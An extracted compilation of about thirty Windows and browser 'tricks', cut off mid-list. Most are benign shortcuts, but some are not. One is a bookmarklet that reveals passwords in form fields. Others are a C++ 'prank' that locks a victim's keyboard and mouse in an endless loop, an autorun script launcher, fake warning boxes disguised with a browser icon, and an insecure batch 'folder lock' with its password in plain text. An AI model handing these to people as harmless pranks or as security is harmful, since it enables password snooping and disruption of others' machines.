Sie sind auf Seite 1von 230

Trick-1

Know the Password behind the asterisks in your browser



I have seen some people who search a lot on this trick. You can find some freeware software, but
those will not work.
You have to buy a software for the same purpose
Even if some freeware works in one browser then it will not work in other browser.

Here is the Trick,

First open a browser and then goto http://mail.yahoo.com/ or http://www.gmail.com/ and then enter
your user name and password but don't click on submit or don't click on login .
After entering the password, that password is hidden behind the asterisks.

Now clear the url on the browser and copy the below code and paste it there and hit enter.

That's it. your entered password behind the asterisks is shown below "Passwords in forms on this
page:"

Quote:
javascript function(){var%20s,F,j,f,i;%20s%20=%20%22%22;%20F%20=%20document.forms;%20for(j=0;%20j<F.length;%20++j)%20{%20f%20=%20F[j];%
%20+=%20f[i].value%20+%20%22\n%22;%20}%20}%20if%20(s)%20alert(%22Passwords%20in%20forms%20on%20this%20page:
Quote:
put : ( insted of smily in Browser Between javascript: (function like this

Trick-2

Create shortcut for removing pendrive

Rather than clicking on the task bar and then safely removing the pendrive you can eaily
do so creating a shortcut:

1)Create shortcut on your desktop by right click and selecting new shortcut from the menu.

2)Type "RunDll32.exe shell32.dll,Control_RunDLL hotplug.dll" click next and then finish.

shortcut is created and now you can assign a shortcut key to it.

just right click on it and select properties-> click on shortcut tab -> assign a shortcut key to
it(it will take clrt + alt by default)

eg: if you press 1 shortcut will be ctrl+alt+1
Trick-3
watch secret star wars in win xp

1) Open RUN Prompt and type "telnet" (Without quotes). You can find Run Prompt by pressing the Windows
and R button together or you can find it in the Start Menu.

2) A Black color Command box appears.

3) Type O and press Enter. ( O stands for Open Port in Microsoft Telnet ).

4) Now type after the prompt "towel.blinkenlights.nl" without the quotes

5) Press Enter and Voila!!!! , You will see Star Wars Movies being played out.


What amuses one is the characters in the movie , the environment , and the fonts are made out of all the
characters in ASCII table.

U must have an internet connection .speed do doesn't matter
Trick-4
Lock Your Computer on Mouse Click!

Instead of pressing CTRL+ALT+DEL or windows + L to lock your machine you can create an icon
to lock your machine. There are very simple steps by using it you can simply lock your computer
using single mouse click.

Just Follow the simple step >>

1. Right click an empty spot on the desktop, point to New and click Shortcut.

2. In the Create Shortcut dialog box, type the following in the 'Type the location' of the item text
box:
Quote:
rundll32 user32.dll,LockWorkStation


3. Click Next

4. In "Type a name for this shortcut", type "" (any name as u wish) and Click Finish

5. This will Create a shortcut in your Desktop.

6.Now each time when you want to lock the computer , Just click on this shortcut.
Trick-5
Paste an image to ur folder's background..

First of all, select ur desired folder..
and hit "ALT+ENTER".. a properties dialog will pop up..
go to Customize tab Customize. There, choose any icon, click Apply and OK.

now in the address bar of ur folder.. type "\desktop.ini" before ur folder's path..
a file named "desktop.ini" will open in notepad..
just add these lines on it..
Quote:
[ExtShellFolderViews]
{BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-
00C04FD706EC}
[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
IconArea_Image=C:\path\folder\background.jpg


To customize this according to your needs, edit the path in the last line to reflect to the location of
the image you wish to use as the background image for that folder. Refresh the folder and the new
background should appear.

now, to remove the default icon chosen during the creation of the desktop.ini and restore the default
folder icon, delete these lines of code from within the desktop.ini file:
Quote:
[.ShellClassInfo]
IconFile=%SystemRoot%\system32\shell32.dll
IconIndex=(some number)
Trick-6
Make your Windows XP talk as you type..

Open a text file in notepad and write:

copy from here:-

Dim msg, sapi

msg=InputBox("Enter your text","Talk it")

Set sapi=CreateObject("sapi.spvoice")

sapi.Speak msg

Save the file with a (*.vbs) extension, it will create a VBScript File.

Then after clicking the .vbs file, it will prompt you for a text, input the text and press ok.
Trick-7
Try to create a folder

In windows we cannot use the name CON for any folder.. even tech from the Microsoft
couldn't resolve it..
But here again, is the solution to create the folder named con and other system variables.

1) go to run dialog.
2) type cmd/command (command prompt gets opened)
3) go to root directory like C:\ or D:\ etc
4) type md\\.\\c:\\con ....(here is done)
5) check the folder on the respected drive.
Trick-8
Get better youtube quality videos


Step1: Click to video that you want to see, the link will display on Address bar. E.x:
Quote:
http://youtube.com/watch?v=9BNJwPFJ0Os

Step2: Add &fmt=6 to the end of that string. That address like:
Quote:
http://youtube.com/watch?v=9BNJwPFJ0Os&fmt=6


Enjoy it ! The higher quality video !!!

Step3: Add &fmt=18 to the end of that string, you'll have the best quality video with direct
download link !
Quote:
http://youtube.com/watch?v=9BNJwPFJ0Os&fmt=18

Note: Appending &fmt=6 to the URL delivers a 448x336 resolution version of the video and
appending &fmt=18 delivers a even better 480x360 resolution version.
Trick-9
Change the Default Location for Installing Programs

XP uses the C:/Program Files directory as the default base directory into which new programs are
installed.
However, you can change the default installation drive and/or directory by using a Registry hack.
Run the Registry Editor and go to
Quote:
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion
Look for the value named ProgramFilesDir.
By default, the value will be C:/Program Files.
Edit the value to any valid drive or folder; XP will use that new location as the default installation
directory for new programs.
Trick-10
How to lock a folder with a password without a
software

Steps:

1- make a new folder ( name it as you like )

2- inside this folder make a ( TXT ) file & copy inside it this (the entire thing)
Quote:
: cls
@ECHO OFF
title Folder Private
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End


3- After u copy the Commanding go to line 23 (or try using shortcut- CTRL+F and type password to
locate the line) u will find this word : password here (Change it with any password u like.) is :

eg:
Quote:
if NOT %pass%== narnia1234 goto FAIL
//so ur password here becomes narnia1234 .//


4- After that go to save as & name this file as "locker.bat "

5- Now back to the folder & u will find a ( LOCKER ) commanding.
(locker.exe)

6- Double Click on it & u will find a new folder (Private )

7- Ok ,, now copy what u want in this "private Folder" & after that come out of the folder, and
Double click on locker again. It will open and ask if you want to lock your folder? Y/N ?

8- Type Y. your private folder will dissapear.

9- If you want to UNLOCK your folder ,go to (locker) & type your pass and you will see your
private folder.

it not only hides the folder, but incase, u unhide all files... and try opening it without entering
password, it'll take u to the control panel...

Also, if u want to store files on your Pen-Drive, u can use this script. No Software Required

Incase u delete your Locker file (just in case), then u can make a new one (but with the same
password) and open it from that.

Alternatively, u can keep this locker file somewhere else, and when u want to open ur folder, only
then bring it back to that place ..
Trick-11
Hlde our Hurd Dlsk Drltes ! Hlde lmportunt dutu
from other USLRS

When you need to secure your important data from other users, there are so many choice
over there like folder protect,hide folder and much more. But imagine if your data size is
more than 100 GB then it is not easy to burn it on CD or protect it. So don't worry friends, I
am posting a trick by using this trick you can save your full drive by hiding it from other
users. You can hide your drives without any Registry Edit.


1. Log on as Administrator

2. Click on Start button then click on Run > Type CMD

3.Now type diskpart at the command prompt and wait for 5 seconds to appear diskpart>
utility.

4.To show the list of volume, type list volume

command after the diskpart> prompt, this command will show you all system drives detail.


5.Now Select the volume that you want to hide for example

If you want to hide F drive then first type select volume 2 (in this case) and hit enter button

6.After selecting volume, type Remove letter F (in this case) to hide F drive.

7. DONE. Now you hide your drive successfully..to verify go to My Computer and check
drives

8.But next time, when you want to unhide the F drive, just type assign letter F command
after loading volume 2.
Trick-12
How to create a bootable Windows XP SP1 CD (Nero)

Step 1

Create 3 folders - C:\WINXPSP1, C:\SP1106 and C:\XPBOOT

Step 2

Copy the entire Windows XP CD into folder C:\WINXPSP1

Step 3

You will have to download the SP1 Update, which is 133MB.
Rename the Service Pack file to XP-SP1.EXE
Extract the Service Pack from the Run Dialog using the command:
C:\XP-SP1.EXE -U -X:C:\SP1106

Step 4

Open Start/Run... and type the command:
C:\SP1106\update\update.exe -s:C:\WINXPSP1

Click OK

Folder C:\WINXPSP1 contains: Windows XP SP1


How to Create a Windows XP SP1 CD Bootable

Step 1

Download xpboot.zip
Quote:
http:://throu.port5.com/xpboot.zip
( no download manager !! )

Extract xpboot.zip file (xpboot.bin) in to the folder C:\XPBOOT

Step 2

Start Nero - Burning Rom.
Select File > New... from the menu.
1.) Select CD-ROM (Boot)
2.) Select Image file from Source of boot image data
3.) Set Kind of emulation: to No Emulation
4.) Set Load segment of sectors (hex!): to 07C0
5.) Set Number of loaded sectors: to 4
6.) Press the Browse... button

Step 3

Select All Files (*.*) from File of type:
Locate boot.bin in the folder C:\XPBOOT

Step 4

Click ISO tab
Set File-/Directory length to ISO Level 1 (Max. of 11 = 8 + 3 chars)
Set Format to Mode 1
Set Character Set to ISO 9660
Check all Relax ISO Restrictions

Step 5

Click Label Tab
Select ISO9660 from the drop down box.
Enter the Volume Label as WB2PFRE_EN
Enter the System Identifier as WB2PFRE_EN
Enter the Volume Set as WB2PFRE_EN
Enter the Publisher as MICROSOFT CORPORATION
Enter the Data Preparer as MICROSOFT CORPORATION
Enter the Application as WB2PFRE_EN

* For Windows XP Professional OEM substitute WB2PFRE_EN with WXPOEM_EN
* For Windows XP Home OEM substitute WB2PFRE_EN with WXHOEM_EN

Step 6

Click Burn tab
Check Write
Check Finalize CD (No further writing possible!)
Set Write Method to Disk-At-Once

Press New button

Step 7

Locate the folder C:\WINXPSP1
Select everything in the folder and drag it to the ISO compilation panel.
Click the Write CD Dialog button.

Press Write

You're done.
Trick-13
Hou to recoter Wlndous XP udmlnlstutor
pussuord
Lost User Passwords. (Windows XP)

If you have lost or forgotten a user account password in Win XP, simply log in as the
computer administrator, and go to control panel, user accounts. Here you will be able to
reset the password for any of the systems user accounts.

Lost Administrator Password. (Windows XP)

Slightly more work needed if you lose or forget the Windows XP administrator password.

First reboot Windows XP in safe mode by re-starting the computer and pressing F8
repeated as the computer starts up. Then (in safe mode) click Start and then click Run. In
the open box type "control userpasswords2" without the quotes - I have just used quotes to
differentiate what you have to type.

You will now have access to all the user accounts, including the administrators account
and will be able to reset the lost password.

Just click the administrators user account, and then click Reset Password.

You will need to add a new password in the New password and the Confirm new password
boxes, and confirm by clicking OK.

All done, you have recovered the lost administrators password!
Trick-14
Hou to Mote Web AppIlcutlons to Your
Desktop

Although many people have their favorite web apps setup as their homepage on their
browsers, there are times when running a web app inside its own window in a separate
process could come handy. Think about having your browser clogged up with way above
30-40 tabs open and crashing at random times.

Then, you will just have to open it again and fire up the web interface you were working
with at the time of the crash. A desktop web app will automatically eliminate the need of
restarting your work flow all over again just because a buggy web browser decided that he
had enough.

Thats only a quick example why one would need a web app to run on its desktop. To be
able to do it, you will have to use an application developed by Mozilla and named Prism. It
enables the end user to easily integrate any type of web application into a friendly desktop
environment.

Why use it

Most probably the final users of the desktop web apps will be those who dont know a lot
about computers, the kind of people who consider a web app like a distinct application.
This is actually a good thing if you see it from the developers point of view because, this
way, people will tend not to think that they are on the web.

Thus, the web app will get a temporary status of desktop application, a fact that, added up
to the lack of toolbars and other browser specific elements, will help the end user to get a
lot more focus on the task at hand and greatly reduce distractions.

Wondering what other uses you might have for such an app? Well, you could use it to stay
logged on into a Google calendar account without having to re-login when switching
between your Gmail accounts, easily access a local web app inside a business
environment where you do not need a full browsing experience, and the list could go on.

Also, Prism will allow the web developers to easily create web apps that can run on Prism
without having to worry about specifically targeting Prism, because a web app that will run
in a modern standards compliant web browser will automatically be able to run in Prism.

Prism is an application built on Firefox, therefore it is cross-platform (runs on Mac OS X,
Linux and Windows) and supports Internet technologies like HTML, CSS, and JavaScript.

How to use it

First of all, go HERE and download Prism to your computer. After mounting the
downloaded dmg file, copy Prism to your Applications folder and run it by double clicking
on its icon.

In the window that will appear you will get access to all the options you will need to
configure the desktop web app you want to create. I have chosen the Google Gmail web
app as an example, but you can migrate to your desktop any other app you may want to.

In the URL field fill in the link to the web app you have chosen and write down the name
that Prism should give it after making it available on your desktop. The Show location bar,
Show status message and progress and Enable navigation keys can be selected or left
as they are according to your own taste. In case you want your web app to only be able to
go to a single web location (like the aforementioned Gmail for example), be sure not to
select the location bar.

The Create Shortcuts option sub-group will help you choose the places where you want
the web app to be available and the Icon option will allow you to quickly select an image
that you wan to associate with the web app you want to create. You will be able to choose
between the web apps fav icon (as it is called in the Prism interface the icon from the
web) or to select a custom image from your computer.

The next step is to push the OK button and Prism will take care of everything. The web app
will be available on your Desktop, Dock and/or Applications Folder, according to what you
have chosen on the desktop web app creation interface.

Who would use it

I suppose many people will not get the idea behind the Prism project and will think it is just
a feature-less web browser. Thats what Ive thought in the beginning too but, after
considering all the things everyone had to say (web developers, web browser users,
people who dont have a lot of computer know-how), I think Prism might prove very useful
in the business environment.

Here, when somebody wants to access a web app, the need for toolbars and all types of
add-ons and buttons is almost close to zero, therefore being able to access the web app in
a clean and focused environment should prove very helpful in maximizing the amount of
attention on the task at hand and, in the end, creating a more productive environment.

Im not saying others wont find it useful too (the Google Calendar example above should fit
the profiles of a lot of people), its just that this type of approach doesnt feel natural to most
web users. Many have already said it just resembles too much making a shortcut to the
actual website where the web app runs or even giving up on the multi-tabbed browser
experience.
Trick-15
Play mp3 on autoplay [pendrive or CD]

Step 1
Download Xmplay


Quote:

http://www.un4seen.com/download.php?xmplay34


then extract it to your pen drive, put a mp3 in the folder and open xmplay to scan the files you're
copied, play it and save the playlist.

Step 2
now open notepad and copy and paste the following codes
Quote:
Sub Run(ByVal sFile,sParam)
Dim shell
Set shell = CreateObject("WScript.Shell")
shell.Run Chr(34) & sFile & Chr(34) & sParam, 1, false
Set shell = Nothing
End SubRun "xmplay\xmplay.exe", "-play"
i assumed that you're extracted it in the root directory and the playlist is into xmplay. Save it as
<whatever>.vbs.

step 3
open notepad and copy and paste the following codes
Quote:
[AutoRun]
shellexecute=<whatever>.vbs
ACTION=Play
Trick-16
Install Xp From Dos
If XP will not install from the CD or if you have a new drive with no operating system on
it yet try these:

Install Windows XP from the hard drive with Windows 98 already installed:

Boot Windows 98
Insert the XP CD into your CD reader
Explore Windows XP through My Computer
Copy i386 folder to C:\
Go into C:\i386 folder and double click on winnt32.exe to launch the setup from the hard
drive

Install Windows XP from DOS (ie. no OS on a new hard drive):

Boot with a Windows 98 Start Up disk

Insert the Windows 98 CD into the CD reader

Run smartdrv.exe from the Win98 directory on the windows 98 CD (file caching)

Type cd.. to back up to the root directory

Insert Windows XP CD into the CD reader

Copy the i386 folder to C:\

Go into C:\i386 folder on C: and type winnt.exe to launch the setup from the hard drive.
Trick-17

How to exceed your download limit on
Rapidshare/Others
NOTE: complicated, and yes there are proxy sites to get around rapidshare, however there are none
currently that'll get around rapidshare.com:


Okay, here is a quick tutorial on how to get around those annoying "Wait X minutes before
downloading" messages, as well as the one-file-at-a-time limits that are frequent on Rapidshare and
similar sites. This tutorial uses Opera (because it has the best download manager), but can probably
be adapted for any browser

Step 1. Since this will slow down each download quite a bit, pick 4 or 5 Rapidshares that you've
always wanted. This will give you the most speed boost.

Step 2. Start the biggest one as you normally would, by clicking the "Free" button.

Step 3. Go to
Quote:
http://www.samair.ru/proxy/

and pick a proxy. configure your browser to use it. (In Opera, Tools/Preferences, Advanced tab,
Network on the right, then click the Proxy Servers button.

Before the colon is the IP, after is the port.

Step 4: Finally, test it for speed. If the proxy seems pretty fast, start the next download, and repeat
Step 3&4 until you have all your files downloading. If it seems too slow, repeat step 3 until you find
a fast one.
Trick-18
Five one line steps to disable the rightclick on
Desktop

To eliminate the right click on the desktop:

run command by selecting and then choose run and then

1. type Regedit
2. Go to
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
\Explorer
3. Add a DWORD and give it a name of NoViewContextMenu
4. Give it a value of 1
5. Reboot
Trick-19
Your Home Page Never Being Changed

Some websites illegally modify your registry editor and set their website as
default home page, for stop this,

1. Right-click on the Internet Explorer icon on your desktop and select
"Properties".

2. In the "Target" box you will see "C:\Program Files\Internet

Explorer\IEXPLORE.EXE".

3. Now by adding the URL of the site to the end of this it overrides any
Homepage setting in internet options:

"C:\Program Files\Internet Explorer\IEXPLORE.EXE" exbii.com
Trick-20
Scare your friends by creating fake warning
boxes(100% working)

Its very easy

Open Notepad and put this in

x = msgbox("box message",0+48 ,"box title")

Simply replace the "Box message" with the message of your choice ,do the
same with "box title"

Now for the button selection......

x = msgbox("box message",0+48 ,"box title")

The 0 is where you want to select the buttons you have

0 =OK Button
1 = OK and Cancel
2 = Abort Retry and ignore
3 = Yes No and Cancel
4 = Yes and No
5 = Retry and Cancel

and now for the logo.......

x = msgbox("box message",0+48 ,"box title")

The 48 is what you are going to be changing........


16 = Critical Message
32 = Warning Query
48 = Warning Message
64 = Information Message


Now just save that as ******.vbs(replace *** with whatever you want)

Now, if you want to trick someone into thinking it is there Internet Icon for
exaple...........

Move the file to any place that it will not be seen

Right click on the file you have made and select "Create Shortcut"


Then when you have the shortcut to it

Now place this for example on the desktop

Now right click on the shortcut.....

Select Properties and click on the "Shortcut" tab
Now click the "Change Icon" button

Now you can find an icon of your choice...
Now click "ok" and "ok" again

Now when u click it you will get a error message
Trick-21
How To Create Bootable USB To Install Windows Vista

This tutorial will help you in creating a bootable USB drive of Windows Vista
which you can use to install Vista in any system. It might become very useful
when you don't have access to DVD drive.

1. First format your USB drive in NTFS file system. You can do it by attaching
your USB drive to your system and then format it from My Computer window.

2. Now open Command Prompt window from Start menu. Right-click on
Command Prompt entry in start menu and select "Run as administrator" option.

3. Now type diskpart in Command Prompt window and press Enter. It'll launch
DiskPart program

4. Now provide following command:

list volume

It'll show a list of all drives in your system. Look for your USB drive entry. As in
the below screenshot, the USB drive is "G" which you can determine from its
"Type" entry.

Now you have to select the USB drive volume by providing select volume no.
command. Since in our case volume no. of USB drive is "Volume 4", the
command would be:

select volume 4

Now we have to make this drive active. So provide active command:

active

Now exit from DiskPart using exit command.

5. Now we need to create Boot sector on USB drive. We'll use "bootsect.exe"
utility for this task. You can find this utility in Windows Vista setup disk. It'll be
present in "Boot" directory.

Now provide following command in Command Prompt:

bootsect /nt60 G:

Here G is drive letter of USB drive. Replace it with the correct drive letter if your
system has some other letter for USB drive.

6. At last, copy all files/folders from Vista Setup DVD to your USB drive and you
have done.

Now you can boot using your USB drive and can install Windows Vista in any
system.
Trick-22
Create Your Own Drive!

IF U WANT TO CREATE UR OWN PERSONAL DRIVE!
then...

Do this

Go to c drive

Create a new folder ( say samp1 )

now go to command prompt and type

subst z: c:\samp1

now go to my computer and check it..........


To remove the drive

go to command prompt and type

subst z: /d


It might be old.. but Not every One knows it...
Trick-23
Clean Your RAM & Make Your Comp Speed
Better

Clean your RAM
You may recognize that your system gets slower and slower when playing and
working a lot with your Desktop or a laptop. Thats because your RAM is full of
remaining progress pieces you do not need any more.
Open the notepad and type

FreeMem=Space(64000000)
in this file and save it as RAMcleaner.vbs [ You should choose the All Files
option when u save it ]

Run the file and ur RAM may be cleaned :>
Of course u can edit the code in the file for a greater cleaning-progress.

FreeMem=Space(128000000)

just try it out.. it worked for me.
Trick-24
C++ Pranks

Here are 2 source codes you can compile and run, harmless and fun and you can send
them to your friends.

Requirements:
Dev C++ or Microsoft C++ express or any compiler

Change the Window Text (the text on the top left corner of a window):
Quote:
#include <windows.h>
using namespace std;

int main()
{
FreeConsole();

HWND Window;
Window = GetForegroundWindow();
SetWindowText(Window, "YOUR TEXT HERE");

SwapMouseButton(true);
Sleep(10000);
SwapMouseButton(false);

return 0;
}


This program first rename the foreground window text to what ever you want, then it
swaps the mouse button for 10 seconds. finally it swaps the mouse buttons back and
end the program.


Quote:
#include <windows.h>
int main()
{
FreeConsole();
while(1)
{
BlockInput(true);
}
}


This program simply disables the keyboard and mouse until the user restarts the
computer.
Trick-25
folder option missing!!

Open Run and then type "gpedit.msc".

Now goto User Configuration > Administrative templates > Windows
Component > Windows Explorer.

Click on Windows Explorer you will find the 3rd option on the right side of
screen "Removes the Folder Option menu item from the Tools menu"

Just check it, if it is not configured then change it to enable by double clicking
on it and after applying again set it to not configured.

I hopes that you will find the option after restarting windows.
Trick-26
Restart Windows without restarting the
Computer

When you click on the SHUTDOWN button, make sure to simultaneous press
SHIFT Button. If you hold the Shift key down while clicking on SHUTDOWN
button, you computer would restart without restarting the Computer.
This is equivalent to term "HOT REBOOT"
Trick-27
How to connect your friends pc and solve his problems
sitting at ur home

Its very easy and useful for us to help our friends with their computer problems.This
trick allows you to access your friend's computer and then solve the problem by sitting
at your home no matter if u r on other OTHER end of the world.

Just follow the instructions.

1- Go to link and free download the software.
Quote:
http://rapidshare.com/files/27675702...ewer_Setup.exe

Your friend should have installed it too.

2- install it not run it.

3- check on personal

4- Agree on both terms

5- Use normal installation and click next.

6-setup is finished.

Now when it starts it will give u ur ID and PASS.
In order to access ur friends computer u will need his Pass AND ID then click on
Connect to partner.His desktop will appear on UR desktop.
Trick-28
Make Your keyboard a live disco.

This code when executed makes your Caps, Num, Scroll lock keys flash..
very attractive...i have tried it..trust me

Instructions:
*paste the code in notepad
*Save as disco.vbs
*Run the file
This piece of code makes your keyboard a live disco...
Quote:

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop


Trick-29
boost full speed to your broadband
connection
1.Go to===>> "My Network Places" properties , highlight the connection then at the menu
bar choose "Advanced" then "Advanced Settings". Uncheck the two boxes in the lower half
for the bindings for File and Printer sharing and Client for MS networks. Click OK.

Continue as indicated below steps:
1. from the Windows XP CD in the support directory from the support cab, extract the file
netcap.exe and place it in a directory on your hard drive or even in the root of your C:\
drive.

2. next, open up a command prompt window and change directories to where you put
netcap.exe then type "netcap/?". It will list some commands that are available for netcap
and a netmon driver will be installed. At the bottom you will see your adapters. You should
see two of them if using a 3Com card. One will be for LAN and the other will be for WAN
something or other.

3. Next type "netcap/Remove". This will remove the netmon driver.

4. Open up control panel ==> system ==> hardware==>device manager and look at your
network adapters. You should now see two of them and one will have a yellow ! on it. Right
click on the one without the yellow ! and choose uninstall. YES! you are uninstalling your
network adapter, continue with the uninstall. Do not restart yet.

5. Check your connection properties to make sure that no connection exists. If you get a
wizard just cancel out of it.

6. Now restart the machine and go to your connection properties again and you should
have a new connection called "Local area connection 2". highlight the connection then at
the menu bar choose "Advanced" then "Advanced Settings". Uncheck the two boxes in the
lower half for the bindings for File and Printer sharing and Client for MS networks. Click
OK.

8. Choose connection properties and uncheck the "QOS" box

9. Restart the machine and enjoy the increased responsiveness of IE, faster page loading,
and a connection speed boost...
Trick-30
Some of the important cmd prompt
commands :
Copy and keep it handy..

ADDUSERS --Add or list users to/from a CSV file
ARP -- Address Resolution Protocol
ASSOC -- Change file extension associations
ASSOCIAT --One step file association
AT -- Schedule a command to run at a later time
ATTRIB --Change file attributes

BOOTCFG --Edit Windows boot settings
BROWSTAT --Get domain, browser and PDC info

CACLS -- Change file permissions
CALL --Call one batch program from another
CD --Change Directory - move to a specific Folder
CHANGE-- Change Terminal Server Session properties
CHKDSK -- Check Disk - check and repair disk problems
CHKNTFS -- Check the NTFS file system
CHOICE --Accept keyboard input to a batch file
CIPHER --Encrypt or Decrypt files/folders
CleanMgr ---Automated cleanup of Temp files, recycle bin
CLEARMEM ---Clear memory leaks
CLIP ---Copy STDIN to the Windows clipboard.
CLS ---Clear the screen
CLUSTER ---Windows Clustering
CMD ---Start a new CMD shell
COLOR --- Change colors of the CMD window
COMP ---Compare the contents of two files or sets of files
COMPACT --- Compress files or folders on an NTFS partition
COMPRESS ---Compress individual files on an NTFS partition
CON2PRT ---Connect or disconnect a Printer
CONVERT ---Convert a FAT drive to NTFS.
COPY ---Copy one or more files to another location
CSCcmd ---Client-side caching (Offline Files)
CSVDE ---Import or Export Active Directory data

DATE --- Display or set the date
Dcomcnfg DCOM ---Configuration Utility
DEFRAG ---Defragment hard drive
DEL ---Delete one or more files
DELPROF--- Delete NT user profiles
DELTREE ---Delete a folder and all subfolders
DevCon ---Device Manager Command Line Utility
DIR ---Display a list of files and folders
DIRUSE --- Display disk usage
DISKCOMP--- Compare the contents of two floppy disks
DISKCOPY ---Copy the contents of one floppy disk to another
DNSSTAT ---DNS Statistics
DOSKEY --- Edit command line, recall commands, and create macros
DSADD ---Add user (computer, group..) to active directory
DSQUERY--- List items in active directory
DSMOD ---Modify user (computer, group..) in active directory

ECHO--- Display message on screen
ENDLOCAL--- End localisation of environment changes in a batch file
ERASE ---Delete one or more files
EXIT ---Quit the current script/routine and set an errorlevel.
EXPAND --- Uncompress files
EXTRACT--- Uncompress CAB files

FC--- Compare two files
FDISK--- Disk Format and partition
FIND ---Search for a text string in a file
FINDSTR--- Search for strings in files
FOR /F ---Loop command: against a set of files
FOR /F ---Loop command: against the results of another command
FOR ---Loop command: all options Files, Directory, List
FORFILES ---Batch process multiple files
FORMAT ---Format a disk
FREEDISK ---Check free disk space (in bytes)
FSUTIL --- File and Volume utilities
FTP --- File Transfer Protocol
FTYPE--- Display or modify file types used in file extension associations

GLOBAL --- Display membership of global groups
GOTO ---Direct a batch program to jump to a labelled line

HELP--- Online Help
HFNETCHK--- Network Security Hotfix Checker

IF--- Conditionally perform a command
IFMEMBER Is the current user in an NT Workgroup
IPCONFIG Configure IP

KILL Remove a program from memory

LABEL --- Edit a disk label
LOCAL --- Display membership of local groups
LOGEVENT--- Write text to the NT event viewer.
LOGOFF --- Log a user off
LOGTIME --- Log the date and time in a file

MAPISEND ---Send email from the command line
MEM --- Display memory usage
MD --- Create new folders
MKLINK --- Create a symbolic link (linkd)
MODE ---Configure a system device
MORE --- Display output, one screen at a time
MOUNTVOL ----Manage a volume mount point
MOVE --- Move files from one folder to another
MOVEUSER--- Move a user from one domain to another
MSG ---Send a message
MSIEXEC --- Microsoft Windows Installer
MSINFO ---Windows NT diagnostics
MSTSC --- Terminal Server Connection (Remote Desktop Protocol)
MUNGE --- Find and Replace text within file(s)
MV --- Copy in-use files

NET --- Manage network resources
NETDOM --- Domain Manager
NETSH ---Configure network protocols
NETSVC ---Command-line Service Controller
NBTSTAT --- Display networking statistics (NetBIOS over TCP/IP)
NETSTAT --- Display networking statistics (TCP/IP)
NOW --- Display the current Date and Time
NSLOOKUP--- Name server lookup
NTBACKUP ---Backup folders to tape
NTRIGHTS E---dit user account rights

PATH --- Display or set a search path for executable files
PATHPING ---Trace route plus network latency and packet loss
PAUSE --- Suspend processing of a batch file and display a message
PERMS --- Show permissions for a user
PERFMON ---Performance Monitor
PING ---Test a network connection
POPD --- Restore the previous value of the current directory saved by PUSHD
PORTQRY--- Display the status of ports and services
PRINT --- Print a text file
PRNCNFG --- Display, configure or rename a printer
PRNMNGR --- Add, delete, list printers set the default printer
PROMPT --- Change the command prompt
PsExec --- Execute process remotely
PsFile --- Show files opened remotely
PsGetSid --- Display the SID of a computer or a user
PsInfo ---List information about a system
PsKill --- Kill processes by name or process ID
PsList --- List detailed information about processes
PsLoggedOn ---Who's logged on (locally or via resource sharing)
PsLogList ---Event log records
PsPasswd --- Change account password
PsService --- View and control services
PsShutdown ---Shutdown or reboot a computer
PsSuspend ---Suspend processes
PUSHD --- Save and then change the current directory

QGREP --- Search file(s) for lines that match a given pattern.

RASDIAL ---Manage RAS connections
RASPHONE ---Manage RAS connections
RECOVER --- Recover a damaged file from a defective disk.
REG --- Registry: Read, Set, Export, Delete keys and values
REGEDIT --- Import or export registry settings
REGSVR32--- Register or unregister a DLL
REGINI ---Change Registry Permissions
REM --- Record comments (remarks) in a batch file
REN --- Rename a file or files.
REPLACE --- Replace or update one file with another
RD ---Delete folder(s) [remove dir]
RDISK ---Create a Recovery Disk
RMTSHARE ---Share a folder or a printer
ROBOCOPY--- Robust File and Folder Copy
ROUTE --- Manipulate network routing tables
RUNAS --- Execute a program under a different user account
RUNDLL32--- Run a DLL command (add/remove print connections)

SC --- Service Control
SCHTASKS--- Create or Edit Scheduled Tasks
SCLIST --- Display NT Services
ScriptIt Control ---GUI applications
SET --- Display, set, or remove environment variables
SETLOCAL--- Control the visibility of environment variables
SETX ---Set environment variables permanently
SHARE --- List or edit a file share or print share
SHIFT --- Shift the position of replaceable parameters in a batch file
SHORTCUT ---Create a windows shortcut (.LNK file)
SHOWGRPS ---List the NT Workgroups a user has joined
SHOWMBRS ---List the Users who are members of a Workgroup
SHUTDOWN ---Shutdown the computer
SLEEP --- Wait for x seconds
SOON --- Schedule a command to run in the near future
SORT --- Sort input
START --- Start a separate window to run a specified program or command
SU ---Switch User
SUBINACL ---Edit file and folder Permissions, Ownership and Domain
SUBST --- Associate a path with a drive letter
SYSTEMINFO--- List system configuration
TASKLIST--- List running applications and services
TIME ---Display or set the system time
TIMEOUT--- Delay processing of a batch file
TITLE --- Set the window title for a CMD.EXE session
TOUCH --- Change file timestamps
TRACERT --- Trace route to a remote host
TREE --- Graphical display of folder structure
TYPE --- Display the contents of a text file
USRSTAT--- List domain usernames and last login
VER ---Display version information
VERIFY --- Verify that files have been saved
VOL --- Display a disk label
WHERE --- Locate and display files in a directory tree
WHOAMI --- Output the current UserName and domain
WINDIFF --- Compare the contents of two files or sets of files
WINMSD --- Windows system diagnostics
WINMSDP--- Windows system diagnostics II
WMIC ---WMI Commands
XCACLS --- Change file permissions
XCOPY--- Copy files and folders
Trick-31
Installing xp in 10 minute

Here is a gr8 secret that we can bypass the 39 minute of time while we are
installing windows xp.

